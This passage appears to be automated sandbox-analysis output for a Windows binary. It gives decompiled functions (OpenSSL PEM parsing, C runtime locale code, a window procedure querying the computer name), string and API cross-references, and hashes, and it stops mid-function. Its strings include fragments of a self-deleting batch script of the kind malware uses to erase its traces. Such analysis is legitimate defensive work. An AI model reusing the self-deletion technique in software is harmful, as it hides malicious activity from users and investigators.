CreateMutexA.KERNEL32(00000000,00000000,{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}), ref: 00412550
GetLastError.KERNEL32 ref: 0041255B
CloseHandle.KERNEL32 ref: 0041256E

Strings

{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}, xrefs: 00412547
{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}, xrefs: 004124F5
"if exist ", xrefs: 00412648
" goto try, xrefs: 00412666
D, xrefs: 00412720
@echo off:trydel ", xrefs: 0041262A
delself.bat, xrefs: 0041261C
del ", xrefs: 00412674
TEMP, xrefs: 004125DF

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateErrorLastMutex
String ID: "if exist "$" goto try$@echo off:trydel "$D$TEMP$del "$delself.bat${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
API String ID: 2372642624-488272950
Opcode ID: 4506a078386c228e7a8f507305766ec05e664451a55683de5f3f64ca7fb9d614
Instruction ID: b8d6f70f31989c1caf7dd59f8aefe182ce9601728b58fe5e15313657dd94e056
Opcode Fuzzy Hash: 4506a078386c228e7a8f507305766ec05e664451a55683de5f3f64ca7fb9d614
Instruction Fuzzy Hash: 03714E72940218AADF50ABE1DC89FEE7BACFB44305F0445A6F609D2090DF759A88CF64

Uniqueness

Uniqueness Score: -1.00%

Function 004635B0 Relevance: 21.5, APIs: 7, Strings: 5, Instructions: 475
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 56%

			E004635B0(void* __ebx, intOrPtr* __edx, void* __ebp, char _a4, char _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr* _a24, intOrPtr* _a28, char _a32, char _a36, char _a132, char _a137, char _a141, char _a143, char _a386, signed int _a388, intOrPtr _a396, intOrPtr* _a400, intOrPtr* _a404, intOrPtr* _a408, intOrPtr* _a412) {
				intOrPtr _v0;
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				void* __edi;
				void* __esi;
				signed int _t125;
				void* _t141;
				void* _t146;
				void* _t151;
				void* _t157;
				intOrPtr _t159;
				void* _t162;
				intOrPtr _t164;
				intOrPtr _t168;
				intOrPtr _t169;
				intOrPtr _t173;
				intOrPtr _t176;
				intOrPtr _t178;
				intOrPtr _t180;
				intOrPtr _t183;
				char _t186;
				intOrPtr _t188;
				intOrPtr _t193;
				intOrPtr _t206;
				intOrPtr _t210;
				intOrPtr _t218;
				void* _t219;
				intOrPtr _t222;
				intOrPtr _t224;
				char _t236;
				void* _t237;
				void* _t240;
				void* _t241;
				intOrPtr _t244;
				intOrPtr _t251;
				void* _t252;
				intOrPtr _t253;
				intOrPtr _t257;
				void* _t258;
				intOrPtr* _t261;
				intOrPtr _t262;
				intOrPtr _t263;
				intOrPtr _t264;
				intOrPtr* _t265;
				void* _t266;
				intOrPtr _t267;
				intOrPtr _t269;
				signed int _t271;
				signed int _t272;
				void* _t274;
				void* _t275;
				void* _t279;
				void* _t280;
				void* _t284;

				_t247 = __edx;
				E0042F7C0(0x188);
				_t125 =  *0x50ad20; // 0x934ff656
				_a388 = _t125 ^ _t271;
				_push(__ebx);
				_a16 = _a400;
				_push(__ebp);
				_a28 = _a404;
				_t251 = _a396;
				_a20 = _a408;
				_a12 = _t251;
				_a24 = _a412;
				_a4 = 0;
				_t236 = E0045AF30(__ebx, __edx, _t251);
				_a8 = _t236;
				_t257 = E0045AF30(_t236, __edx, _t251);
				_v0 = _t257;
				_t269 = E0045AF30(_t236, __edx, _t251);
				if(_t236 == 0 || _t257 == 0 || _t269 == 0) {
					E0045AD10(_t236);
					E0045AD10(_t257);
					E0045AD10(_t269);
					E004512D0(_t236, _t247, _t251, _t269, __eflags, 9, 0x6d, 0x41, ".\\crypto\\pem\\pem_lib.c", 0x2b4);
					_t272 = _t271 + 0x20;
					goto L72;
				} else {
					_a386 = 0;
					_t141 = E0044F780(_t251, _t269, _t251,  &_a132, 0xfe);
					_t274 = _t271 + 0xc;
					_t284 = _t141;
					if(_t284 <= 0) {
						L14:
						_push(0x2bf);
						_push(".\\crypto\\pem\\pem_lib.c");
						_push(0x6c);
						goto L15;
					} else {
						do {
							if(_t284 >= 0) {
								while( *((char*)(_t274 + _t141 + 0x94)) <= 0x20) {
									_t141 = _t141 - 1;
									if(_t141 >= 0) {
										continue;
									}
									goto L8;
								}
							}
							L8:
							 *((char*)(_t274 + _t141 + 0x95)) = 0xa;
							_t146 = _t141 + 2;
							if(_t146 >= 0x100) {
								L74:
								E0042AC83();
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								_push(_t251);
								_t253 = E0044F960(_t236, _t247, E004656B0());
								__eflags = _t253;
								if(__eflags != 0) {
									_push(_t257);
									E0044F3E0(_t253, _t269, _t253, 0x6a, 0, _v12);
									_push(_a4);
									_push(_v0);
									_push(_v4);
									_push(_v8);
									_push(_t253);
									_t151 = E00463C30(_t247, _t269);
									E0044F5E0(_t253);
									return _t151;
								} else {
									E004512D0(_t236, _t247, _t253, _t269, __eflags, 9, 0x71, 7, ".\\crypto\\pem\\pem_lib.c", 0x248);
									__eflags = 0;
									return 0;
								}
							} else {
								 *((char*)(_t274 + _t146 + 0x98)) = 0;
								_t157 = E00448190( &_a132, "-----BEGIN ", 0xb);
								_t279 = _t274 + 0xc;
								if(_t157 != 0) {
									goto L13;
								} else {
									_t261 =  &_a143;
									_t240 = _t261 + 1;
									do {
										_t159 =  *_t261;
										_t261 = _t261 + 1;
									} while (_t159 != 0);
									_t257 = _t261 - _t240;
									_t162 = E00448190( &_a137 + _t257, "-----\n", 6);
									_t279 = _t279 + 0xc;
									if(_t162 == 0) {
										_t164 = E0045AD50(_t236, _t247, _t269, _t236, _t257 + 9);
										_t274 = _t279 + 8;
										__eflags = _t164;
										if(__eflags != 0) {
											E0042D8D0( *((intOrPtr*)(_t236 + 4)),  &_a143, _t257 - 6);
											_t168 =  *((intOrPtr*)(_t236 + 4));
											_t236 = 0;
											 *((char*)(_t168 + _t257 - 6)) = 0;
											_t262 = _v0;
											_t169 = E0045AD50(0, _t247, _t269, _t262, 0x100);
											_t274 = _t274 + 0x14;
											__eflags = _t169;
											if(__eflags != 0) {
												 *((char*)( *((intOrPtr*)(_t262 + 4)))) = 0;
												_t263 = E0044F780(_t251, _t269, _t251,  &_a132, 0xfe);
												_t274 = _t274 + 0xc;
												__eflags = _t263;
												if(__eflags <= 0) {
													L32:
													_t264 = 0;
													__eflags = 0;
													goto L33;
												} else {
													do {
														if(__eflags >= 0) {
															while(1) {
																__eflags =  *((char*)(_t274 + _t263 + 0x94)) - 0x20;
																if( *((char*)(_t274 + _t263 + 0x94)) > 0x20) {
																	goto L27;
																}
																_t263 = _t263 - 1;
																__eflags = _t263;
																if(_t263 >= 0) {
																	continue;
																}
																goto L27;
															}
														}
														L27:
														 *((char*)(_t274 + _t263 + 0x95)) = 0xa;
														_t257 = _t263 + 2;
														__eflags = _t257 - 0x100;
														if(_t257 >= 0x100) {
															goto L74;
														} else {
															 *((char*)(_t274 + _t257 + 0x94)) = 0;
															__eflags = _a132 - 0xa;
															if(_a132 == 0xa) {
																goto L32;
															} else {
																_t251 = _t257 + _t236;
																_t222 = E0045AD50(_t236, _t247, _t269, _v0, _t251 + 9);
																_t274 = _t274 + 8;
																__eflags = _t222;
																if(__eflags == 0) {
																	_push(0x2e4);
																	goto L22;
																} else {
																	_t224 = E00448190( &_a132, "-----END ", 9);
																	_t274 = _t274 + 0xc;
																	__eflags = _t224;
																	if(_t224 == 0) {
																		_t251 = _a12;
																		_t264 = 1;
																		L33:
																		_a4 = 0;
																		_t173 = E0045AD50(_t236, _t247, _t269, _t269, 0x400);
																		_t274 = _t274 + 8;
																		__eflags = _t173;
																		if(__eflags != 0) {
																			 *_a4 = 0;
																			__eflags = _t264;
																			if(_t264 != 0) {
																				_t251 = _t269;
																				_v0 = _t251;
																				_t269 = _v0;
																				_a4 = _t236;
																				goto L51;
																			} else {
																				_t267 = E0044F780(_t251, _t269, _t251,  &_a132, 0xfe);
																				_t274 = _t274 + 0xc;
																				__eflags = _t267;
																				if(_t267 <= 0) {
																					L50:
																					_t251 = _v0;
																					L51:
																					_t236 = _a8;
																					_t265 =  *((intOrPtr*)(_t236 + 4));
																					_t83 = _t265 + 1; // 0x9
																					_t241 = _t83;
																					do {
																						_t176 =  *_t265;
																						_t265 = _t265 + 1;
																						__eflags = _t176;
																					} while (_t176 != 0);
																					_t266 = _t265 - _t241;
																					_t178 = E00448190( &_a132, "-----END ", 9);
																					_t274 = _t274 + 0xc;
																					__eflags = _t178;
																					if(__eflags != 0) {
																						L70:
																						_push(0x322);
																						_push(".\\crypto\\pem\\pem_lib.c");
																						_push(0x66);
																						goto L15;
																					} else {
																						_t180 = E00448190( *((intOrPtr*)(_t236 + 4)),  &_a141, _t266);
																						_t274 = _t274 + 0xc;
																						__eflags = _t180;
																						if(__eflags != 0) {
																							goto L70;
																						} else {
																							_t183 = E00448190( &_a141 + _t266, "-----\n", 6);
																							_t274 = _t274 + 0xc;
																							__eflags = _t183;
																							if(__eflags != 0) {
																								goto L70;
																							} else {
																								E0047E5B0( &_a36);
																								_push(_a4);
																								_t186 = _a4;
																								_push(_t186);
																								_push( &_a4);
																								_push(_t186);
																								_push( &_a36);
																								_t188 = E0047E5D0();
																								_t274 = _t274 + 0x18;
																								__eflags = _t188;
																								if(__eflags >= 0) {
																									_t193 = E0047E560( &_a36, _a4 + _a4,  &_a32);
																									_t275 = _t274 + 0xc;
																									__eflags = _t193;
																									if(__eflags >= 0) {
																										_t244 = _a4 + _a32;
																										__eflags = _t244;
																										_a4 = _t244;
																										if(_t244 == 0) {
																											goto L17;
																										} else {
																											 *_a16 =  *((intOrPtr*)(_t236 + 4));
																											 *_a28 =  *((intOrPtr*)(_t251 + 4));
																											_t247 = _a20;
																											 *_a20 = _a4;
																											 *_a24 = _t244;
																											E00454C70(_t236);
																											E00454C70(_t251);
																											E00454C70(_t269);
																											_t272 = _t275 + 0xc;
																										}
																									} else {
																										_push(0x332);
																										_push(".\\crypto\\pem\\pem_lib.c");
																										_push(0x64);
																										goto L15;
																									}
																								} else {
																									_push(0x32c);
																									_push(".\\crypto\\pem\\pem_lib.c");
																									_push(0x64);
																									goto L15;
																								}
																							}
																						}
																					}
																					goto L73;
																				} else {
																					_t236 = 0;
																					__eflags = _t267;
																					do {
																						if(__eflags >= 0) {
																							while(1) {
																								__eflags =  *((char*)(_t274 + _t267 + 0x94)) - 0x20;
																								if( *((char*)(_t274 + _t267 + 0x94)) > 0x20) {
																									goto L44;
																								}
																								_t267 = _t267 - 1;
																								__eflags = _t267;
																								if(_t267 >= 0) {
																									continue;
																								}
																								goto L44;
																							}
																						}
																						L44:
																						 *((char*)(_t274 + _t267 + 0x95)) = 0xa;
																						_t257 = _t267 + 2;
																						__eflags = _t257 - 0x100;
																						if(_t257 >= 0x100) {
																							goto L74;
																						} else {
																							__eflags = _t257 - 0x41;
																							 *((char*)(_t274 + _t257 + 0x94)) = 0;
																							_t236 =  !=  ? 1 : _t236;
																							_t206 = E00448190( &_a132, "-----END ", 9);
																							_t274 = _t274 + 0xc;
																							__eflags = _t206;
																							if(_t206 == 0) {
																								goto L50;
																							} else {
																								__eflags = _t257 - 0x41;
																								if(_t257 > 0x41) {
																									goto L50;
																								} else {
																									_t210 = E0045AE30(_t236, _t247, _t269, _t269, _a4 + 9 + _t257);
																									_t274 = _t274 + 8;
																									__eflags = _t210;
																									if(__eflags == 0) {
																										_push(0x303);
																										goto L22;
																									} else {
																										E0042D8D0(_a4 + _a4,  &_a132, _t257);
																										_t280 = _t274 + 0xc;
																										_push(0xfe);
																										 *((char*)(_a4 + _t257 + _a4)) = 0;
																										_a4 = _a4 + _t257;
																										_push( &_a132);
																										_push(_t251);
																										__eflags = _t236;
																										if(_t236 != 0) {
																											_a132 = 0;
																											_t218 = E0044F780(_t251, _t269);
																											_t274 = _t280 + 0xc;
																											__eflags = _t218;
																											if(_t218 <= 0) {
																												goto L50;
																											} else {
																												while(1) {
																													__eflags =  *((char*)(_t274 + _t218 + 0x94)) - 0x20;
																													if( *((char*)(_t274 + _t218 + 0x94)) > 0x20) {
																														break;
																													}
																													_t218 = _t218 - 1;
																													__eflags = _t218;
																													if(_t218 >= 0) {
																														continue;
																													}
																													break;
																												}
																												 *((char*)(_t274 + _t218 + 0x95)) = 0xa;
																												_t219 = _t218 + 2;
																												__eflags = _t219 - 0x100;
																												if(_t219 >= 0x100) {
																													goto L74;
																												} else {
																													 *((char*)(_t274 + _t219 + 0x94)) = 0;
																													goto L50;
																												}
																											}
																										} else {
																											goto L49;
																										}
																									}
																								}
																							}
																						}
																						goto L77;
																						L49:
																						_t267 = E0044F780(_t251, _t269);
																						_t274 = _t280 + 0xc;
																						__eflags = _t267;
																					} while (__eflags > 0);
																					goto L50;
																				}
																			}
																		} else {
																			_push(0x2f1);
																			goto L22;
																		}
																	} else {
																		goto L31;
																	}
																}
															}
														}
														goto L77;
														L31:
														E0042D8D0( *((intOrPtr*)(_v0 + 4)) + _t236,  &_a132, _t257);
														 *((char*)( *((intOrPtr*)(_v0 + 4)) + _t257 + _t236)) = 0;
														_t236 = _t251;
														_t251 = _a12;
														_t263 = E0044F780(_t251, _t269, _t251,  &_a132, 0xfe);
														_t274 = _t274 + 0x18;
														__eflags = _t263;
													} while (__eflags > 0);
													goto L32;
												}
											} else {
												_push(0x2d8);
												L22:
												_push(".\\crypto\\pem\\pem_lib.c");
												_push(0x41);
												_push(0x6d);
												_push(9);
												E004512D0(_t236, _t247, _t251, _t269, __eflags);
												_t236 = _a8;
												goto L16;
											}
										} else {
											_push(0x2ce);
											_push(".\\crypto\\pem\\pem_lib.c");
											_push(0x41);
											L15:
											_push(0x6d);
											_push(9);
											E004512D0(_t236, _t247, _t251, _t269, _t291);
											L16:
											_t275 = _t274 + 0x14;
											L17:
											E0045AD10(_t236);
											E0045AD10(_v0);
											E0045AD10(_t269);
											_t272 = _t275 + 0xc;
											L72:
											L73:
											_pop(_t252);
											_pop(_t258);
											_pop(_t237);
											return E0042A77E(_t237, _a388 ^ _t272, _t247, _t252, _t258);
										}
									} else {
										goto L13;
									}
								}
							}
							goto L77;
							L13:
							_t141 = E0044F780(_t251, _t269, _t251,  &_a132, 0xfe);
							_t274 = _t279 + 0xc;
							_t291 = _t141;
						} while (_t141 > 0);
						goto L14;
					}
				}
				L77:
			}

0x004635b0
0x004635b5
0x004635ba
0x004635c1
0x004635cf
0x004635d0
0x004635db
0x004635dc
0x004635e9
0x004635f0
0x004635fb
0x004635ff
0x00463603
0x00463610
0x00463612
0x0046361b
0x0046361d
0x00463626
0x0046362a
0x00463b6f
0x00463b75
0x00463b7b
0x00463b90
0x00463b95
0x00000000
0x00463640
0x0046364c
0x00463656
0x0046365b
0x0046365e
0x00463660
0x00463704
0x00463704
0x00463709
0x0046370e
0x00000000
0x00463666
0x00463666
0x00463666
0x00463670
0x0046367a
0x0046367b
0x00000000
0x00000000
0x00000000
0x0046367b
0x00463670
0x0046367d
0x0046367d
0x00463685
0x0046368d
0x00463bb3
0x00463bb3
0x00463bb8
0x00463bb9
0x00463bba
0x00463bbb
0x00463bbc
0x00463bbd
0x00463bbe
0x00463bbf
0x00463bc0
0x00463bcc
0x00463bd1
0x00463bd3
0x00463bf1
0x00463bfb
0x00463c00
0x00463c04
0x00463c08
0x00463c0c
0x00463c10
0x00463c11
0x00463c19
0x00463c25
0x00463bd5
0x00463be5
0x00463bed
0x00463bf0
0x00463bf0
0x00463693
0x00463695
0x004636aa
0x004636af
0x004636b4
0x00000000
0x004636b6
0x004636b6
0x004636bd
0x004636c0
0x004636c0
0x004636c2
0x004636c3
0x004636c7
0x004636da
0x004636df
0x004636e4
0x0046373e
0x00463743
0x00463746
0x00463748
0x00463767
0x0046376c
0x0046376f
0x00463776
0x0046377b
0x00463780
0x00463785
0x00463788
0x0046378a
0x004637b2
0x004637c2
0x004637c4
0x004637c7
0x004637c9
0x0046388c
0x0046388c
0x0046388c
0x00000000
0x004637cf
0x004637cf
0x004637cf
0x004637d1
0x004637d1
0x004637d9
0x00000000
0x00000000
0x004637db
0x004637db
0x004637dc
0x00000000
0x00000000
0x00000000
0x004637dc
0x004637d1
0x004637de
0x004637de
0x004637e6
0x004637e9
0x004637ef
0x00000000
0x004637f5
0x004637f5
0x004637fd
0x00463805
0x00000000
0x0046380b
0x0046380b
0x00463816
0x0046381b
0x0046381e
0x00463820
0x004638bd
0x00000000
0x00463826
0x00463835
0x0046383a
0x0046383d
0x0046383f
0x004638b2
0x004638b6
0x0046388e
0x00463894
0x0046389c
0x004638a1
0x004638a4
0x004638a6
0x004638ca
0x004638cd
0x004638cf
0x00463ace
0x00463ad0
0x00463ad4
0x00463ad6
0x00000000
0x004638d5
0x004638e8
0x004638ea
0x004638ed
0x004638ef
0x004639c4
0x004639c4
0x004639c8
0x004639c8
0x004639cc
0x004639cf
0x004639cf
0x004639d2
0x004639d2
0x004639d4
0x004639d5
0x004639d5
0x004639e2
0x004639ea
0x004639ef
0x004639f2
0x004639f4
0x00463b5d
0x00463b5d
0x00463b62
0x00463b67
0x00000000
0x004639fa
0x00463a06
0x00463a0b
0x00463a0e
0x00463a10
0x00000000
0x00463a16
0x00463a27
0x00463a2c
0x00463a2f
0x00463a31
0x00000000
0x00463a37
0x00463a3c
0x00463a41
0x00463a45
0x00463a4c
0x00463a4d
0x00463a4e
0x00463a53
0x00463a54
0x00463a59
0x00463a5c
0x00463a5e
0x00463af1
0x00463af6
0x00463af9
0x00463afb
0x00463b12
0x00463b12
0x00463b16
0x00463b1a
0x00000000
0x00463b20
0x00463b28
0x00463b31
0x00463b33
0x00463b3a
0x00463b40
0x00463b42
0x00463b48
0x00463b4e
0x00463b53
0x00463b56
0x00463afd
0x00463afd
0x00463b02
0x00463b07
0x00000000
0x00463b07
0x00463a64
0x00463a64
0x00463a69
0x00463a6e
0x00000000
0x00463a6e
0x00463a5e
0x00463a31
0x00463a10
0x00000000
0x004638f5
0x004638f5
0x004638f7
0x004638f9
0x004638f9
0x00463900
0x00463900
0x00463908
0x00000000
0x00000000
0x0046390a
0x0046390a
0x0046390b
0x00000000
0x00000000
0x00000000
0x0046390b
0x00463900
0x0046390d
0x0046390d
0x00463915
0x00463918
0x0046391e
0x00000000
0x00463924
0x00463924
0x00463927
0x00463936
0x00463946
0x0046394b
0x0046394e
0x00463950
0x00000000
0x00463952
0x00463952
0x00463955
0x00000000
0x00463957
0x00463962
0x00463967
0x0046396a
0x0046396c
0x00463ac0
0x00000000
0x00463972
0x00463983
0x0046398b
0x00463994
0x00463999
0x004639a4
0x004639a8
0x004639a9
0x004639aa
0x004639ac
0x00463a75
0x00463a7d
0x00463a82
0x00463a85
0x00463a87
0x00000000
0x00463a90
0x00463a90
0x00463a90
0x00463a98
0x00000000
0x00000000
0x00463a9a
0x00463a9a
0x00463a9b
0x00000000
0x00000000
0x00000000
0x00463a9b
0x00463a9d
0x00463aa5
0x00463aa8
0x00463aad
0x00000000
0x00463ab3
0x00463ab3
0x00000000
0x00463ab3
0x00463aad
0x00000000
0x00000000
0x00000000
0x004639ac
0x0046396c
0x00463955
0x00463950
0x00000000
0x004639b2
0x004639b7
0x004639b9
0x004639bc
0x004639bc
0x00000000
0x004638f9
0x004638ef
0x004638a8
0x004638a8
0x00000000
0x004638a8
0x00000000
0x00000000
0x00000000
0x0046383f
0x00463820
0x00463805
0x00000000
0x00463841
0x00463854
0x00463867
0x00463873
0x00463875
0x0046387f
0x00463881
0x00463884
0x00463884
0x00000000
0x004637cf
0x0046378c
0x0046378c
0x00463791
0x00463791
0x00463796
0x00463798
0x0046379a
0x0046379c
0x004637a1
0x00000000
0x004637a1
0x0046374a
0x0046374a
0x0046374f
0x00463754
0x00463710
0x00463710
0x00463712
0x00463714
0x00463719
0x00463719
0x0046371c
0x0046371d
0x00463726
0x0046372c
0x00463731
0x00463b98
0x00463b9a
0x00463ba1
0x00463ba2
0x00463ba4
0x00463bb2
0x00463bb2
0x00000000
0x00000000
0x00000000
0x004636e4
0x004636b4
0x00000000
0x004636e6
0x004636f4
0x004636f9
0x004636fc
0x004636fc
0x00000000
0x00463666
0x00463660
0x00000000

APIs

_strncmp.LIBCMT ref: 004636AA
_strncmp.LIBCMT ref: 004636DA
_strncmp.LIBCMT ref: 00463835
_strncmp.LIBCMT ref: 00463946
_strncmp.LIBCMT ref: 004639EA
_strncmp.LIBCMT ref: 00463A06
_strncmp.LIBCMT ref: 00463A27

Strings

.\crypto\pem\pem_lib.c, xrefs: 00463709, 0046374F, 00463791, 00463A69, 00463B02, 00463B62, 00463B85, 00463BDA
-----, xrefs: 004636D4, 00463A21
, xrefs: 00463A90
-----BEGIN , xrefs: 004636A4
-----END , xrefs: 0046382F, 00463940, 004639E4

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: _strncmp
String ID: $-----$-----BEGIN $-----END $.\crypto\pem\pem_lib.c
API String ID: 909875538-2733969777
Opcode ID: cb9e21a8909c22ae086980ad9bb3b6b683aca236df65bd2ad44c41cd33641913
Instruction ID: 696768b63e7695c6252fa4396c8fc8293dc5daf0279c077ed15b414a568efc74
Opcode Fuzzy Hash: cb9e21a8909c22ae086980ad9bb3b6b683aca236df65bd2ad44c41cd33641913
Instruction Fuzzy Hash: 82F1E7B16483806BE721EE25DC42F5B77D89F5470AF04082FF948D6283F678DA09879B

Uniqueness

Uniqueness Score: -1.00%

Function 00425A97 Relevance: 19.6, APIs: 13, Instructions: 84
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 78%

			E00425A97(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t12;
				intOrPtr _t13;
				intOrPtr _t15;
				intOrPtr _t22;
				intOrPtr* _t42;

				if(_a4 > 5 || _a8 == 0) {
					L4:
					return 0;
				} else {
					_t42 = E00428C96(8, 1);
					_t48 = _t42;
					if(_t42 != 0) {
						_t12 = E00428C96(0xb8, 1);
						 *_t42 = _t12;
						__eflags = _t12;
						if(_t12 != 0) {
							_t13 = E00428C96(0x220, 1);
							 *((intOrPtr*)(_t42 + 4)) = _t13;
							__eflags = _t13;
							if(_t13 != 0) {
								E004255AC( *_t42, 0x50aae8);
								_t15 = E00425E97(__ebx, __edx, 1, _t42,  *_t42, _a4, _a8);
								_push( *((intOrPtr*)(_t42 + 4)));
								__eflags = _t15;
								if(__eflags == 0) {
									L14:
									E00420BED();
									E0042453C( *_t42);
									E004243E2( *_t42);
									E00420BED(_t42);
									_t42 = 0;
									L16:
									return _t42;
								}
								_push( *((intOrPtr*)( *_t42 + 4)));
								_t22 = E00424BDD(__edx, 1, __eflags);
								__eflags = _t22;
								if(_t22 == 0) {
									 *((intOrPtr*)( *((intOrPtr*)(_t42 + 4)))) = 1;
									goto L16;
								}
								_push( *((intOrPtr*)(_t42 + 4)));
								goto L14;
							}
							E00420BED( *_t42);
							E00420BED(_t42);
							L8:
							goto L3;
						}
						E00420BED(_t42);
						goto L8;
					}
					L3:
					 *((intOrPtr*)(E00425208(_t48))) = 0xc;
					goto L4;
				}
			}

0x00425aa0
0x00425ac6
0x00000000
0x00425aa8
0x00425ab3
0x00425ab7
0x00425ab9
0x00425ad2
0x00425ad7
0x00425adb
0x00425add
0x00425aee
0x00425af3
0x00425af8
0x00425afa
0x00425b13
0x00425b20
0x00425b28
0x00425b2b
0x00425b2d
0x00425b42
0x00425b42
0x00425b49
0x00425b50
0x00425b56
0x00425b5e
0x00425b67
0x00000000
0x00425b67
0x00425b31
0x00425b34
0x00425b3b
0x00425b3d
0x00425b65
0x00000000
0x00425b65
0x00425b3f
0x00000000
0x00425b3f
0x00425afe
0x00425b04
0x00425ae5
0x00000000
0x00425ae5
0x00425ae0
0x00000000
0x00425ae0
0x00425abb
0x00425ac0
0x00000000
0x00425ac0

APIs

__calloc_crt.LIBCMT ref: 00425AAE

Part of subcall function 00428C96: __calloc_impl.LIBCMT ref: 00428CA5

__calloc_crt.LIBCMT ref: 00425AD2
_free.LIBCMT ref: 00425AE0
__calloc_crt.LIBCMT ref: 00425AEE
_free.LIBCMT ref: 00425AFE
_free.LIBCMT ref: 00425B04
__copytlocinfo_nolock.LIBCMT ref: 00425B13
__wsetlocale_nolock.LIBCMT ref: 00425B20
__setmbcp_nolock.LIBCMT ref: 00425B34
_free.LIBCMT ref: 00425B42
___removelocaleref.LIBCMT ref: 00425B49
___freetlocinfo.LIBCMT ref: 00425B50
_free.LIBCMT ref: 00425B56

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
String ID:
API String ID: 1503006713-0
Opcode ID: 17d3c2619d013419f6fb4dbcd9dc3d5229f96e394bca3e5d2eaf771417ff5058
Instruction ID: 8b5b6749b4f509f283f4592c8036b9fc340ac08d61b50d13b2524a40b9fdfb6a
Opcode Fuzzy Hash: 17d3c2619d013419f6fb4dbcd9dc3d5229f96e394bca3e5d2eaf771417ff5058
Instruction Fuzzy Hash: 7E21B331705A21ABE7217F66B802E1F7FE4DF41728BD0442FF44459192EA39A800CA5D

Uniqueness

Uniqueness Score: -1.00%

Function 0041BAE0 Relevance: 18.3, APIs: 12, Instructions: 320
windowCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E0041BAE0(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				char _v8;
				char _v12;
				signed int _v16;
				char _v20;
				char _v24;
				char _v32;
				char _v40;
				char _v2308;
				char _v2312;
				intOrPtr _v2316;
				int _v2320;
				intOrPtr _v2328;
				int _v2332;
				short _v2336;
				intOrPtr _v2340;
				short _v2348;
				intOrPtr _v2352;
				int _v2356;
				short _v2372;
				char _v2376;
				int _v2384;
				int _v2388;
				intOrPtr _v2396;
				int _v2400;
				intOrPtr _v2404;
				long _v2408;
				intOrPtr _v2412;
				int _v2416;
				char _v2424;
				char _v2432;
				char _v2436;
				signed int _v2440;
				void* _v2448;
				intOrPtr _v2452;
				signed int _v2456;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t100;
				intOrPtr* _t101;
				long _t102;
				void* _t111;
				long _t117;
				void* _t125;
				void* _t128;
				void* _t136;
				intOrPtr _t140;
				long _t141;
				long _t150;
				intOrPtr* _t151;
				long _t152;
				void* _t154;
				void* _t155;
				void* _t156;
				void* _t158;
				void* _t161;
				int _t164;
				intOrPtr* _t165;
				signed int _t170;
				short* _t171;
				short* _t172;
				intOrPtr* _t176;
				intOrPtr* _t185;
				void* _t187;
				void* _t191;
				DWORD* _t194;
				struct HWND__* _t195;
				struct HWND__* _t203;
				intOrPtr _t206;
				intOrPtr _t208;
				signed int _t211;
				signed int _t212;
				void* _t213;
				void* _t215;
				void* _t216;
				short* _t218;
				short* _t219;
				void* _t221;

				_t212 = _t211 & 0xfffffff8;
				_t164 = _a8;
				_push(0xffffffff);
				_push(0x4cb187);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t212;
				_t213 = _t212 - 0x978;
				_push(_t158);
				_push(_t191);
				_t221 = _t164 - 0x8001;
				if(_t221 > 0) {
					_t100 = _t164 - 0x8003;
					__eflags = _t100;
					if(_t100 == 0) {
						_t165 =  *0x513268;
						_t101 =  *_t165;
						__eflags = _t101 - _t165;
						if(_t101 == _t165) {
							L46:
							__eflags =  *0x52923c;
							if( *0x52923c != 0) {
								goto L50;
							} else {
								goto L47;
							}
						} else {
							while(1) {
								__eflags =  *((char*)(_t101 + 0xd));
								if( *((char*)(_t101 + 0xd)) != 0) {
									break;
								}
								_t101 =  *_t101;
								__eflags = _t101 - _t165;
								if(_t101 != _t165) {
									continue;
								} else {
									goto L46;
								}
								goto L51;
							}
							L50:
							_t102 = DefWindowProcW(_a4, 0x8003, _a12, _a16);
							 *[fs:0x0] = _v16;
							return _t102;
						}
					} else {
						__eflags = _t100 == 1;
						if(_t100 == 1) {
							_v2408 = 0x400;
							_t205 = E00420C62(_t158, _t187, _t191, 0x800);
							GetComputerNameW(_t107,  &_v2408);
							_v2412 = 7;
							_v2416 = 0;
							_v2432 = 0;
							_v8 = 0;
							_t111 = E00413100( &_v2348, _t191, L"\\\\");
							_v12 = 1;
							_t194 = E0041CE80( &_v2376, _t111, _t205);
